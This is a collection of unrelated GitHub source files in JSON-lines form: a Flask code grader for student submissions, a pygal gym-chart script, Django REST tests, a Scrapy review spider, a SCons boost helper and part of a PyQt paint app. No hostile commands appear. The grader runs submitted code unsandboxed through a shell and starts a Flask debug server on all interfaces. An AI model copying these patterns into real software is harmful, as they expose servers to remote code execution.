WHERE `id`=?;'.format(project_name), (result, index,))\n\t\t\tconn.commit()\n\t\t\treturn 'ok'\n\t\texcept:\n\t\t\treturn 'error'\n\n@app.route('/project/data/save/', methods=['POST'])\ndef project_data_save(project_name):\n\tif not 'auth' in session:\n\t\tabort(401)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\tc.execute('DELETE FROM `{}_val`;'.format(project_name))\n\t\tdata = request.json\n\t\tfor k, v in data.items():\n\t\t\ttry:\n\t\t\t\tscore = float(v['score'])\n\t\t\texcept:\n\t\t\t\tscore = 0\n\t\t\tmetadata = json.dumps({\n\t\t\t\t'score': score,\n\t\t\t\t'val_mode': {\n\t\t\t\t\t'check_num': v['val_mode']['check_num'],\n\t\t\t\t\t'check_char': v['val_mode']['check_char'],\n\t\t\t\t}\n\t\t\t\t})\n\t\t\tv['output'] = v['output'].replace('\\\\n', '\\n')\n\t\t\tv['input'] = v['input'].replace('\\\\n', '\\n')\n\t\t\t\n\t\t\tc.execute('INSERT INTO `{}_val`(`id`, `INPUT`, `OUTPUT`, `data`) VALUES (?,?,?,?);'.format(project_name), (v['id'], v['input'], v['output'], metadata))\n\t\t\tconn.commit()\n\t\treturn 'ok'\n\telse:\n\t\tabort(404)\n\n@app.route('/project/view//')\ndef view_code(project_name, id):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (id,))\n\t\texcept:\n\t\t\tpass\n\t\tresult = c.fetchone()\n\t\tcode = json.loads(result[4])['code']\n\t\treturn Response(code, mimetype='text/plain')\n\n@app.route('/project/result//')\ndef view_result(project_name, id):\n\tif project_name in get_all_list():\n\t\tif not 'auth' in session:\n\t\t\tconn = sqlite3.connect(dbfile)\n\t\t\tc = conn.cursor()\n\t\t\ttry:\n\t\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (id,))\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tresult = c.fetchone()\n\t\t\tresult = json.loads(result[4])['val']\n\t\t\tresult['student_id'] = '****-**' + result['student_id'][-3:]\n\t\t\tresult['student_name'] = '***'\n\t\t\t\n\t\t\treturn jsonify(result)\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\ttry:\n\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (id,))\n\t\texcept:\n\t\t\tpass\n\t\tresult = c.fetchone()\n\t\tresult = json.loads(result[4])['val']\n\t\tif getconfig('admin_public_id', True) == False:\n\t\t\tresult['student_id'] = '****-**' + result['student_id'][-3:]\n\t\tif getconfig('admin_public_name', True) == False:\n\t\t\tresult['student_name'] = '***'\n\t\treturn jsonify(result)\n\n@app.route('/project/run/', methods=['POST'])\ndef run_code(project_name):\n\tif not 'auth' in session:\n\t\tabort(404)\n\tif project_name in get_all_list():\n\t\tconn = sqlite3.connect(dbfile)\n\t\tc = conn.cursor()\n\t\t\n\t\tcode_id = request.form.get('id')\n\n\t\tstudent_name = 'sample'\n\t\tstudent_id = '2021-00000'\n\n\t\tif code_id == '-1':\n\t\t\tdata_student = {}\n\t\t\tcode = request.form.get('code')\n\t\telse:\n\t\t\tc.execute('SELECT * FROM {} WHERE `id`=?;'.format(project_name), (code_id,))\n\n\t\t\tresult = c.fetchone()\n\t\t\tif result == None:\n\t\t\t\treturn jsonify({'result': False, 'msg': 'student not found'})\n\t\t\tdata_student = json.loads(result[4])\n\t\t\tstudent_name = result[2]\n\t\t\tstudent_id = result[1]\n\t\t\tcode = data_student['code']\n\t\t\tdata_student['val'] = {\n\t\t\t\t'score': 0,\n\t\t\t\t'details': [],\n\t\t\t\t'score_total': 0,\n\t\t\t\t'student_name': student_name,\n\t\t\t\t'student_id': 
student_id\n\t\t\t}\n\n\t\twith open(os.path.join(run_path, getconfig('run_filename', 'main.py')), 'w') as f:\n\t\t\tf.write(code)\n\t\t\n\t\tc.execute('SELECT * FROM `{}_val`;'.format(project_name))\n\t\tval_set = c.fetchall()\n\t\tval_set = list(map(lambda x: list(x), val_set))\n\n\t\tmetadata = getconfig('metadata_{}'.format(project_name), {})\n\t\tis_val_custom = False\n\t\tif 'is_val_custom' in metadata and metadata['is_val_custom']:\n\t\t\tcode_validator = metadata['code_val_custom']\n\t\t\twith open(os.path.join(run_path, 'validator.py'), 'w') as f:\n\t\t\t\tf.write(code_validator)\n\t\t\tis_val_custom = True\n\n\t\tdeduce_decimal = getconfig('deduce_decimal')\n\t\tdeduce_wrong = getconfig('deduce_wrong')\n\t\tdeduce_tle = getconfig('deduce_tle')\n\t\tdeduce_runtime = getconfig('deduce_runtime')\n\t\t\n\t\tmax_error = getconfig('max_error')\n\t\ttime_limit = getconfig('time_limit')\n\t\tprint(deduce_wrong)\n\t\tprint(data_student['val'])\n\t\tfor i in val_set:\n\t\t\ti[3] = json.loads(i[3])\n\t\t\t\n\t\t\t# print(\"is_val_custom:\", is_val_custom)\n\t\t\tresult = validator(i[1], i[2], check_num=i[3]['val_mode']['check_num'], check_char=i[3]['val_mode']['check_char'], max_error=max_error, time_limit=time_limit, is_val_custom=is_val_custom)\n\t\t\tif is_val_custom: #custom score for custom validator\n\t\t\t\tdata_student['val']['score'] += result['score']\n\t\t\t\tdata_student['val']['score_total'] += result['score_full']\n\t\t\telse:\n\t\t\t\tif result['correct'] == 1:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']\n\t\t\t\t\tresult['score'] = round(i[3]['score'], 3)\n\t\t\t\telif result['correct'] == 0:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_wrong)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_wrong), 3)\n\t\t\t\telif result['correct'] == 3:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_tle)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_tle), 3)\n\t\t\t\telif result['correct'] == 4:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_runtime)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_runtime), 3)\n\t\t\t\telif result['correct'] == 5:\n\t\t\t\t\tdata_student['val']['score'] += i[3]['score']*(1-deduce_decimal)\n\t\t\t\t\tresult['score'] = round(i[3]['score']*(1-deduce_decimal), 3)\n\t\t\t\t\n\t\t\t\tdata_student['val']['score_total'] += i[3]['score']\n\t\t\tdata_student['val']['details'].append(result)\n\t\t\ttime.sleep(0.2)\n\n\t\tdata_student['val']['score_total'] = round(data_student['val']['score_total'], 3)\n\t\tdata_student['val']['score'] = round(data_student['val']['score'], 3)\n\n\t\tdata_student['val']['last'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\t\tdata_json = json.dumps(data_student)\n\n\t\tos.remove(os.path.join(run_path, getconfig('run_filename', 'main.py')))\n\n\t\tif code_id != '-1':\n\t\t\tc.execute('UPDATE {} SET `result`=?, `data`=? 
WHERE `id`=?;'.format(project_name), (4, data_json, code_id,))\n\t\t\tconn.commit()\n\t\tif getconfig('admin_public_id', True) == False:\n\t\t\tdata_student['val']['student_id'] = '****-**' + data_student['val']['student_id'][-3:]\n\t\tif getconfig('admin_public_name', True) == False:\n\t\t\tdata_student['val']['student_name'] = '***'\n\t\treturn jsonify(data_student['val'])\n\tabort(404)\n\ndef execute(input_val='', time_limit=1):\n\tp = subprocess.Popen([getconfig('script', 'python3')+' '+getconfig('run_filename', 'main.py')], cwd=run_path, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n\tinput_lines = input_val.split('\\n')\n\n\tfor i in input_lines:\n\t\tp.stdin.write((i+'\\n').encode())\n\t\tp.stdin.flush()\n\n\tcorrect = -1 #initial value\n\ttry:\n\t\touts, errs = p.communicate(timeout=time_limit)\n\texcept subprocess.TimeoutExpired:\n\t\tp.kill()\n\t\touts, errs = p.communicate()\n\t\tcorrect = 3 #TLE\n\n\touts = outs.decode()\n\tif errs != None:\n\t\terrs = errs.decode()\n\telse:\n\t\terrs = ''\n\tcwdpath = os.path.abspath(os.path.join(os.getcwd(), run_path))\n\terrs = errs.replace(cwdpath, '.')\n\n\treturn outs, errs, p.returncode, correct\n\ndef validator_real(output, answer, check_num, check_char):\n\tif check_num == False and check_char == False:\n\t\tcorrect = 1 #correct\n\telif check_num == True and check_char == False:\n\t\t#remove except numbers\n\t\tout = re.sub(r'[^0-9.\\-]', r' ', output)\n\t\tref = re.sub(r'[^0-9.\\-]', r' ', answer)\n\t\t#remove punctuations without number\n\t\twhile True:\n\t\t\tout, cnt_sub_out = re.subn(r'([^0-9])[.\\-]([^0-9])', r'\\1 \\2', out)\n\t\t\tref, cnt_sub_ref = re.subn(r'([^0-9])[.\\-]([^0-9])', r'\\1 \\2', ref)\n\t\t\tif cnt_sub_out == 0 and cnt_sub_ref == 0: break\n\t\tout = out.strip('.')\n\t\tref = ref.strip('.')\n\t\t#remove excessive whitespaces\n\t\tout = re.sub(r'\\s+', ' ', out).strip()\n\t\tref = re.sub(r'\\s+', ' ', ref).strip()\n\n\t\tout = out.split()\n\t\tref = ref.split()\n\t\t\n\t\tif len(out) != len(ref): #different number of output: wrong!\n\t\t\tcorrect = 0\n\t\telse:\n\t\t\tstate = 1 \n\t\t\tfor k, i in enumerate(out):\n\t\t\t\tj = ref[k]\n\t\t\t\tif i != j: #first, compare as string\n\t\t\t\t\tstate = 0\n\t\t\t\t\tbreak\n\t\t\tif state == 1: #if all values are exactly the same\n\t\t\t\tcorrect = 1 #correct\n\t\t\telse:\n\t\t\t\tstate = 1\n\t\t\t\tfor k, i in enumerate(out):\n\t\t\t\t\tj = ref[k]\n\t\t\t\t\ti_d = re.sub(r'\\.0+', '', i)\n\t\t\t\t\tj_d = re.sub(r'\\.0+', '', j)\n\t\t\t\t\t\n\t\t\t\t\tif i_d != j_d: #compare as float\n\t\t\t\t\t\tstate = 0\n\t\t\t\t\t\tbreak\n\t\t\t\tif state == 1:\n\t\t\t\t\tcorrect = 5 #wrong decimal format (1.0 / 1.000 / 1 type)\n\t\t\t\telse:\n\t\t\t\t\tstate = 1\n\t\t\t\t\tfor k, i in enumerate(out):\n\t\t\t\t\t\tj = ref[k]\n\t\t\t\t\t\tif '.' in i: #if float format\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\ti_f = float(i)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\ti_f = -1e+20\n\t\t\t\t\t\telse: #if int format\n\t\t\t\t\t\t\ti_f = int(i)\n\t\t\t\t\t\tif '.' 
in j:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tj_f = float(j)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tj_f = 1e+20\n\t\t\t\t\t\telse: #if int format\n\t\t\t\t\t\t\tj_f = int(j)\n\t\t\t\t\t\tmax_error = getconfig('max_error', 0.001) #numeric tolerance (same default as the settings page)\n\t\t\t\t\t\tif abs(i_f - j_f) > max_error: #compare as float\n\t\t\t\t\t\t\tstate = 0\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\ti_d = re.sub(r'\\.[0-9]+', '', i)\n\t\t\t\t\t\tj_d = re.sub(r'\\.[0-9]+', '', j)\n\t\t\t\t\t\tif i_d != j_d: #looks the same as a float, but differs as an int (floating-point error is not considered)\n\t\t\t\t\t\t\tstate = 0\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif state == 1:\n\t\t\t\t\t\tcorrect = 5 #wrong decimal format (1.0001 / 1.000 type)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcorrect = 0 #wrong answer\n\telif check_num == False and check_char == True:\n\t\t#remove all numbers\n\t\tout = re.sub(r'-?[0-9.]', r' ', output)\t#jhkim\n\t\tref = re.sub(r'-?[0-9.]', r' ', answer) #jhkim\n\t\t#remove excessive whitespaces\n\t\tout = re.sub(r'\\s+', ' ', out).strip().lower()\n\t\tref = re.sub(r'\\s+', ' ', ref).strip().lower()\n\n\t\tif out == ref:\n\t\t\tcorrect = 1\n\t\telse:\n\t\t\tcorrect = 0\n\n\telif check_num == True and check_char == True:\n\t\t#replace whitespaces and lower\n\t\tout = re.sub(r'\\s+', ' ', output).strip().lower()\t#jhkim\n\t\tref = re.sub(r'\\s+', ' ', answer).strip().lower()\t#jhkim\n\t\tif out == ref:\n\t\t\tcorrect = 1\n\t\telse:\n\t\t\tcorrect = 0\n\treturn correct\n\ndef validator(input_val='', output_val='', check_num=True, check_char=True, max_error=0.001, time_limit=1, is_val_custom=False):\n\touts, errs, returncode, correct = execute(input_val, time_limit)\n\tdetails = ''\n\tscore = 0\n\tscore_full = 0\n\tif correct == -1: #not TLE\n\n\t\tif returncode != 0:\n\t\t\tcorrect = 4 #runtime error\n\t\telse:\n\t\t\tif is_val_custom == True:\n\t\t\t\tfrom environ.validator import validator as validator_custom\n\t\t\t\tcorrect, score, score_full, details = validator_custom(outs, output_val)\n\t\t\telse:\n\t\t\t\tcorrect = validator_real(outs, output_val, check_num, check_char)\n\t\t\t\t\n\t# print(returncode, outs, errs, correct, output_val, input_val, score, score_full, details)\n\tresult = {\n\t\t'result': returncode,\n\t\t'output': outs,\n\t\t'error': errs,\n\t\t'correct': correct,\n\t\t'answer': output_val,\n\t\t'input': input_val,\n\t\t'score': score,\n\t\t'score_full': score_full,\n\t\t'details': details,\n\t}\n\treturn result\n\n@app.route('/static/')\ndef staticfile(path):\n\treturn send_from_directory('static', path)\n\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0', port=5001, debug=True, use_reloader=True)","repo_name":"3e91b5/CCP2021Grader","sub_path":"grader.py","file_name":"grader.py","file_ext":"py","file_size_in_byte":30045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10812099048","text":"import sys\nimport sqlite3\nimport pygal\n\ndef getUserData(ID):\n    '''Returns 5 lists with user data\n    ID = customer ID that is looked up in the database.\n    Return = 5 lists'''\n    conn = sqlite3.connect(\"C:/Users/Administrator/Desktop/rollerorange.github.io-master/sportschoolDatabase.db\")\n    c = conn.cursor()\n    \n    cursor = c.execute('SELECT type FROM KLANT, KLANT_APPARAAT WHERE KLANT.klantID = KLANT_APPARAAT.klantID AND KLANT.klantID=?', (ID,))\n    apparaten = c.fetchall()\n    apparatenLijst = []\n    for x in apparaten:\n        apparatenLijst.append(x[0])\n\n    cursor = c.execute('SELECT verbrande_calorieen FROM KLANT, KLANT_APPARAAT WHERE KLANT.klantID = KLANT_APPARAAT.klantID AND KLANT.klantID=?', (ID,))\n
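execute() above feeds stdin to the child process line by line and maps subprocess.TimeoutExpired onto the TLE verdict (correct = 3). subprocess.run compresses the same run-with-time-limit pattern (a sketch; the command is illustrative, and on timeout the captured output may be partial or None):

import subprocess

def run_submission(cmd, input_text, time_limit=1.0):
    """Return (stdout, stderr, returncode, tle)."""
    try:
        proc = subprocess.run(cmd, input=input_text, capture_output=True,
                              text=True, timeout=time_limit)
        return proc.stdout, proc.stderr, proc.returncode, False
    except subprocess.TimeoutExpired as exc:
        return exc.stdout or '', exc.stderr or '', None, True

out, err, rc, tle = run_submission(['python3', '-c', 'print(input())'], 'hi\n')
print(out.strip(), rc, tle)  # hi 0 False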
    calorieen = c.fetchall()\n    calorieenLijst = []\n    for y in calorieen:\n        calorieenLijst.append(y[0])\n\n    cursor = c.execute('SELECT aptijd FROM KLANT, KLANT_APPARAAT WHERE KLANT.klantID = KLANT_APPARAAT.klantID AND KLANT.klantID=?', (ID,))\n    tijd = c.fetchall()\n    tijdLijst = []\n    for z in tijd:\n        tijdLijst.append(z[0])\n\n    zippedList = zip(apparatenLijst, calorieenLijst, tijdLijst)\n    volleLijst = list(zippedList)\n    temp = []\n    eindLijst = []\n    for x in volleLijst:\n        temp = [x[1], x[2]]\n        eindLijst.append(temp)\n    return(eindLijst)\n\ndef createUserDataGraph(USERID, UREN1, UREN2, UREN3, UREN4, UREN5, CAL1, CAL2, CAL3, CAL4, CAL5):\n    '''Creates an .svg chart file\n    data1 = list object with all the data\n    data2 = list object with all the data\n    data3 = list object with all the data\n    data4 = list object with all the data\n    data5 = list object with all the data'''\n    totaleUren = UREN1 + UREN2 + UREN3 + UREN4 + UREN5\n    totaleCalorieen = CAL1 + CAL2 + CAL3 + CAL4 + CAL5\n    custom_style = pygal.style.Style(\n        colors=('#E853A0', '#E8537A', '#E95355', '#E87653', '#E89B53'),\n        font_family='googlefont:Rubik')\n    gauge = pygal.SolidGauge(\n        half_pie=True, inner_radius=0.50,\n        style=custom_style)\n    if totaleUren != 0 and totaleCalorieen != 0:\n        gauge.add('Uren Gesport', [{'value': totaleUren, 'max_value': totaleUren}])\n        gauge.add('Crosstrainer', [{'value': UREN1, 'max_value': totaleUren}])\n        gauge.add('Hometrainer', [{'value': UREN2, 'max_value': totaleUren}])\n        gauge.add('Loopband', [{'value': UREN3, 'max_value': totaleUren}])\n        gauge.add('Roeitrainer', [{'value': UREN4, 'max_value': totaleUren}])\n        gauge.add('Krachtstation', [{'value': UREN5, 'max_value': totaleUren}])\n        gauge.add('Totale Calorieen', [{'value': totaleCalorieen, 'max_value': totaleCalorieen}])\n        gauge.add('Crosstrainer', [{'value': CAL1, 'max_value': totaleCalorieen}])\n        gauge.add('Hometrainer', [{'value': CAL2, 'max_value': totaleCalorieen}])\n        gauge.add('Loopband', [{'value': CAL3, 'max_value': totaleCalorieen}])\n        gauge.add('Roeitrainer', [{'value': CAL4, 'max_value': totaleCalorieen}])\n        gauge.add('Krachtstation', [{'value': CAL5, 'max_value': totaleCalorieen}])\n    else:\n        gauge.add('Uren Gesport', [{'value': totaleUren}])\n        gauge.add('Crosstrainer', [{'value': UREN1}])\n        gauge.add('Hometrainer', [{'value': UREN2}])\n        gauge.add('Loopband', [{'value': UREN3}])\n        gauge.add('Roeitrainer', [{'value': UREN4}])\n        gauge.add('Krachtstation', [{'value': UREN5}])\n        gauge.add('Totale Calorieen', [{'value': totaleCalorieen}])\n        gauge.add('Crosstrainer', [{'value': CAL1}])\n        gauge.add('Hometrainer', [{'value': CAL2}])\n        gauge.add('Loopband', [{'value': CAL3}])\n        gauge.add('Roeitrainer', [{'value': CAL4}])\n        gauge.add('Krachtstation', [{'value': CAL5}])\n    gauge.render_to_file(\"C:/Users/Administrator/Desktop/rollerorange.github.io-master/charts/user\" + str(USERID) + \"chart.svg\")\n\ndataList = getUserData(str(sys.argv[1]))\ncreateUserDataGraph(str(sys.argv[1]), dataList[0][0], dataList[1][0], dataList[3][0], dataList[4][0], dataList[2][0], dataList[0][1], dataList[1][1], dataList[3][1], dataList[4][1], dataList[2][1])","repo_name":"rollerorange/rollerorange.github.io","sub_path":"userData.py","file_name":"userData.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"27172576920","text":"from rest_framework import status\nfrom tests.factories.personaje.personaje_factories import PersonajeFactory\nfrom tests.test_setup import TestSetUp\n\n
class PersonajeTestCase(TestSetUp):\n    \n    url='/api/v1/personaje/'\n    \n    def test_personajes(self):\n        personaje=PersonajeFactory().create_personaje()\n        response=self.client.get(self.url+'list/',format='json')\n        self.assertEqual(response.status_code,status.HTTP_200_OK)\n    \n    def test_name_personaje(self):\n        personaje=PersonajeFactory().create_personaje()\n        response=self.client.get(self.url+'list/?',{'full_name':personaje.full_name},format='json')\n        self.assertEqual(response.status_code,status.HTTP_200_OK)\n        self.assertEqual(response.data[0]['full_name'],personaje.full_name) \n    \n    def test_name_personaje_error(self):\n        personaje=PersonajeFactory().create_personaje()\n        response=self.client.get(self.url+'list/?full_name=dssdsgsd',format='json')\n        self.assertEqual(response.status_code,status.HTTP_200_OK)\n        self.assertNotEqual(personaje.full_name,\"dssdsgsd\")\n\n    def test_create_personaje(self):\n        personaje=PersonajeFactory().build_personaje_JSON()\n        response=self.client.post(self.url+'list/',\n                                personaje,\n                                format='json'\n                                )\n        \n        self.assertEqual(response.status_code,status.HTTP_201_CREATED)\n        self.assertEqual(response.data['full_name'],personaje['full_name'])\n    def test_update_personaje(self):\n        personaje=PersonajeFactory().create_personaje()\n        response=self.client.put(self.url+'detail/'+str(personaje.id),\n                            {\"full_name\":\"test1\",\n                            \"active\":False},\n                            format='json'\n                            )\n        self.assertEqual(response.status_code,status.HTTP_200_OK)\n    \n    def test_delete_personaje(self):\n        personaje=PersonajeFactory().create_personaje()\n        response=self.client.delete(self.url+'detail/'+str(personaje.id),\n                            format='json'\n                            )\n        self.assertEqual(response.status_code,status.HTTP_204_NO_CONTENT)\n        # self.assertEqual(response.data['full_name'],personaje['full_name'])","repo_name":"flabio/gearplug_challenge","sub_path":"tests/test_personaje/test_personaje.py","file_name":"test_personaje.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"16747247980","text":"from scrapy.spiders.sitemap import Spider\nfrom scraping_subsystem.scraper.items import Review\nfrom scrapy.exceptions import CloseSpider\n\n\nclass OtzovikSpider(Spider):\n    \"\"\"Scraper for the otzovik.ru site\n\n    Args:\n        Spider (Spider): base crawler class\n\n    Raises:\n        CloseSpider: when a page returns no reviews\n    \"\"\"\n\n    name = 'otzovik_spider'\n\n    handle_httpstatus_list = [507]\n\n    page_number = 1\n\n    def parse(self, response):\n        root_reviews = response.xpath(\n            \"//*[@id='content']/div/div/div/div/div[3]/div[1]/div[1]\")\n        reviews = root_reviews.xpath(\n            \"//*[@id='content']/div/div/div/div/div[3]/div[1]/div[1]/div\")\n\n        if len(reviews) == 0:\n            raise CloseSpider('No reviews in response')\n        del root_reviews\n        for review in reviews:\n            tmp_review = Review()\n            tmp_review['review_url'] = review.xpath(\"./meta[1]/@content\").get()\n            tmp_review['author'] = review.xpath(\n                \"./div[@itemprop='author']/div/div/a/span/text()\").get()\n            tmp_review['review_date'] = review.xpath(\n                \"./div[@class='item-right']/div[@class='review-postdate']/span/@title\").get()\n            tmp_review['text_data'] = review.xpath(\n                \"./div[@class='item-right']/div[@class='review-teaser']/text()\").get()\n            yield tmp_review\n        self.page_number += 1\n        next_page = f\"http://otzovik.com/reviews/set_sportivnih_magazinov_sportmaster_russia_moscow/{self.page_number}/\"\n        yield response.follow(next_page, 
callback=self.parse)\n","repo_name":"Analytical-system-of-company-image/scraping-subsystem","sub_path":"scraping_subsystem/scraper/spiders/otzovik_spider.py","file_name":"otzovik_spider.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4027789931","text":"import os\nimport glob\nimport re\nimport sys\n\nclass Found(BaseException):\n pass\n\ndef add_boost(env, libs):\n if env[\"USE_MSVC\"]:\n # compiled boost libraries might have extra prefix and postfix\n paths = []\n if \"LIBPATH\" in env:\n paths += env.subst(env[\"LIBPATH\"])\n paths += os.environ[\"LIB\"].split(\";\")\n paths = [p for p in paths if p != \"\"]\n\n if \"/MDd\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-gd-*\"]\n elif \"/MD\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-*\"]\n elif \"/MTd\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-sgd-*\"]\n elif \"/MT\" in env[\"CCFLAGS\"]:\n SUFFIXES = [\"-vc*-mt-s-*\"]\n\n renamed_libs = []\n for lib in libs:\n try:\n for suffix in SUFFIXES:\n for p in paths:\n fnglob = os.path.join(p, \"lib\" + lib + suffix + \".lib\")\n files = glob.glob(fnglob)\n if len(files) > 0:\n m = re.search(r\"([^\\\\]*[.]lib)\", files[0])\n renamed_libs.append(m.group(1))\n raise Found()\n except Found:\n continue\n else:\n renamed_libs.append(lib)\n\n env.AppendUnique(LIBS=renamed_libs)\n else:\n if sys.platform == \"darwin\":\n rawlibs = libs\n libs = []\n for l in rawlibs:\n if env[\"COMPILE_DEBUG\"]:\n libs.append(l + \"-mt-d\")\n else:\n libs.append(l + \"-mt\")\n env.AppendUnique(LIBS=libs)\n\ndef generate(env):\n libboost_dir = env.get(\"LIBBOOST_DIR\") or os.environ.get(\"LIBBOOST_DIR\")\n if libboost_dir is not None:\n env.AppendUnique(CPPPATH=[os.path.join(libboost_dir, \"include\")])\n env.AddMethod(add_boost, \"AddBoost\")\n\ndef exists(env):\n return True\n","repo_name":"dsiroky/backnocles","sub_path":"tools/scons/boost.py","file_name":"boost.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11491571619","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import *\nfrom PyQt5 import QtWidgets\nimport sys\n\nfrom factories.paint_settings import PaintSettings\nfrom factories.palette_factory import PaletteFactory\n\nfrom widgets.canvas import Canvas\nfrom widgets.widget_item import WidgetItem\nfrom widgets.palette_item import PaletteItem\nfrom widgets.item_container import ItemContainer\nfrom eye_tracker.mouse_emulator import MouseEmulator\n\n\"\"\"Main Window\"\"\"\nclass WindowView(QMainWindow):\n def __init__(self, width, height):\n QMainWindow.__init__(self, flags=Qt.Window)\n self.width = width\n self.height = height\n self.win = QWidget()\n self.widgetItems = []\n self.__setupWindow()\n self.image = None\n\n def setupFirstCursor(self):\n pm = QtGui.QPixmap('../resources/cursorRedCircle.png')\n cursor = QtGui.QCursor(pm)\n self.win.setCursor(cursor)\n self.win.update()\n MouseEmulator.firstTimer.stop()\n\n def setupSecondCursor(self):\n pm = QtGui.QPixmap('../resources/cursorGreenCircle.png')\n cursor = QtGui.QCursor(pm)\n self.win.setCursor(cursor)\n self.win.update()\n MouseEmulator.secondTimer.stop()\n\n def setupDefaultCursor(self):\n self.win.setCursor(Qt.CustomCursor)\n self.win.update()\n\n def __setupWindow(self):\n self.win.setStyleSheet(\"background-color:rgb(200,209,222);\")\n self.win.setWindowTitle(\"PyQt\")\n\n 
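The otzovik record that closes on this line pages through listings by bumping page_number and yielding response.follow, stopping via CloseSpider when a page has no reviews. To run such a spider standalone, Scrapy's CrawlerProcess works (a sketch; the output filename is arbitrary and the FEEDS setting assumes Scrapy >= 2.1):

from scrapy.crawler import CrawlerProcess

process = CrawlerProcess(settings={
    'FEEDS': {'reviews.json': {'format': 'json'}},  # write scraped items to a JSON file
})
process.crawl(OtzovikSpider)  # the spider class from the record above
process.start()               # blocks until the crawl finishes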
toolContainerWidth = self.width * 0.07\n toolContainerHeight = self.height\n\n self.tools = self.__createTools(toolContainerWidth, toolContainerWidth * 0.45)\n self.fileTools = self.__createFileTools(toolContainerWidth, self.width * 0.035)\n\n\n currentColor = PaletteItem(\n toolContainerWidth,\n toolContainerWidth * 0.5,\n None,\n PaintSettings.currentColor\n )\n\n paletteItems = []\n for palette in PaletteFactory.createPalette(PaintSettings.paletteId):\n paletteItems.append(PaletteItem(\n toolContainerWidth * 1,\n toolContainerWidth * 0.25,\n None,\n palette,\n currentColor\n ))\n\n colorLayoutFirstColumn = self.__createToolContainer(\n QVBoxLayout(),\n 0,\n 0,\n paletteItems\n )\n\n colorCurrentContainer = self.__createToolContainer(\n QVBoxLayout(),\n toolContainerWidth,\n toolContainerHeight,\n [currentColor]\n )\n\n self.canvas = self.__createCanvas(self.width * 0.93, self.height)\n\n mainLayout = self.__createBox(\n QHBoxLayout(),\n 0,\n 0,\n self.width,\n self.height,\n (10, 10, 0, 0),\n [\n self.canvas,\n self.__createToolContainer(\n QVBoxLayout(),\n toolContainerWidth,\n toolContainerHeight,\n self.tools + [colorCurrentContainer] + [colorLayoutFirstColumn] + self.fileTools,\n\n )\n ]\n )\n\n self.win.setLayout(\n mainLayout\n )\n\n self.win.setMouseTracking(True)\n\n def __createBox(self, box, x, y, width, height, margins, widgets):\n box.setGeometry(QRect(x, y, width, height))\n box.setContentsMargins(*margins)\n\n for widget in widgets:\n box.addWidget(widget)\n\n return box\n\n def __createCanvas(self, width, height):\n canvas = Canvas(\n width,\n height,\n self\n )\n\n canvas.setFocusPolicy(Qt.StrongFocus)\n\n return canvas\n\n def __createToolContainer(self, layout, width, height, tools):\n toolContainer = ItemContainer(\n width,\n height,\n self\n )\n\n layout.setContentsMargins(0, 10, 0, -5)\n\n toolContainer.setWidgets(\n layout,\n tools\n )\n\n return toolContainer\n\n def __createSliderContainer(self, layout, width, height, margins, tools):\n sliderContainer = ItemContainer(\n width,\n height,\n self\n )\n\n layout.setContentsMargins(*margins)\n\n sliderContainer.setWidgets(\n layout,\n tools\n )\n\n return sliderContainer\n\n def __createTools(self, width, height):\n tools = [\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectRectangle),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/rectangle.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectTriangle),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/triangle.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectCircle),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/circle.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectLine),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/line.png\"))\n ),\n WidgetItem(\n width, height,\n self.onClickItem(PaintSettings.selectPen),\n QtGui.QIcon(QtGui.QPixmap(\"../resources/pen.png\"))\n ),\n 